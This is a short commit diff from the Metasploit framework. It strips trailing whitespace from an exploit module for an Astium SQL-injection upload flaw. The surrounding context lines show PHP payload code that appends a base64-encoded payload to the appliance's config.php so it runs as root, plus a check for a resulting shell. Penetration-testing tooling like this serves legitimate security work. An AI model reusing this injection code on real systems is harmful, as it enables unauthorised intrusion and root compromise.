Kill off EOL spaces on astium_sqli_upload.
parent
0db93111de
commit
fcba424308
|
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
|
||||
# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
|
||||
# else during the config reload it might happen that an extra shell is spawned as the apache user.
|
||||
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
|
||||
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
|
||||
phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
|
||||
phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
|
||||
phppayload << "fclose($f);"
|
||||
|
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}, 120)
|
||||
|
||||
# If we don't get a 200 when we request our malicious payload, we suspect
|
||||
# we don't have a shell, either.
|
||||
# we don't have a shell, either.
|
||||
if res and res.code != 200
|
||||
print_error("#{peer} - Unexpected response...")
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue